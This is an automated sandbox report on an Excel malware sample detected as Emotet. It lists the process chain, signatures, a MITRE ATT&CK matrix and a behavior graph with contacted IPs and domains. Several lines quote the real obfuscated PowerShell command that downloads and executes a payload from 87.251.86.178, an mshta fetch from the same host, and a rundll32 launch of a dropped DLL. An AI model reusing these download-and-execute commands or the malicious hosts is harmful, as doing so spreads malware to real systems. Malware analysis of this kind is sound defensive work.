            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B3D30 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_729B3D30
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
            Source: Yara matchFile source: ggnlRjkfr4.xls, type: SAMPLE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://87.251.86.178/pp/oo.htmlJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssdJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServerJump to behavior
            Source: powershell.exe, 00000005.00000002.665022134.0000000000720000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664849970.0000000000920000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: powershell.exe, 00000005.00000002.665022134.0000000000720000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664849970.0000000000920000.00000002.00020000.sdmpBinary or memory string: !Progman
            Source: powershell.exe, 00000005.00000002.665022134.0000000000720000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664849970.0000000000920000.00000002.00020000.sdmpBinary or memory string: Program Manager<
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,8_2_729D125A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,8_2_729D1331
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,8_2_729D137C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,8_2_729D11FB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,8_2_729C86C3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_729D1425
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,8_2_729D152D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,8_2_729C8BB6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_729D0FA6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,8_2_729D0F0B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_729D0CB1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B3E4B cpuid 8_2_729B3E4B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B4AD2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_729B4AD2

            Stealing of Sensitive Information:

            barindex
            Yara detected EmotetShow sources
            Source: Yara matchFile source: 8.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.577830349.0000000000602000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.577733868.0000000000180000.00000040.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsCommand and Scripting Interpreter111Path InterceptionProcess Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting11Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery131Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information11NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncSystem Information Discovery134Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 544305 Sample: ggnlRjkfr4 Startdate: 23/12/2021 Architecture: WINDOWS Score: 100 36 45.15.23.184 VIRTONO-NETWORKSRO Romania 2->36 38 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->38 40 30 other IPs or domains 2->40 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 10 other signatures 2->52 12 EXCEL.EXE 30 13 2->12         started        signatures3 process4 signatures5 58 Obfuscated command line found 12->58 15 cmd.exe 12->15         started        process6 process7 17 mshta.exe 11 15->17         started        dnsIp8 34 87.251.86.178, 49167, 49168, 80 GALAXYDATARU Russian Federation 17->34 20 powershell.exe 12 7 17->20         started        process9 dnsIp10 42 schedu.teicrete.gr 147.95.16.179, 49170, 80 TEI-OF-CRETE-ASGR Greece 20->42 44 www.catholicroundup.com 157.245.119.201, 49169, 80 DIGITALOCEAN-ASNUS United States 20->44 32 C:\Users\Public\Documents\ssd.dll, PE32 20->32 dropped 54 Powershell drops PE file 20->54 25 cmd.exe 20->25         started        file11 signatures12 process13 process14 27 rundll32.exe 25->27         started        signatures15 56 Tries to detect virtualization through RDTSC time measurements 27->56 30 rundll32.exe 27->30         started        process16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.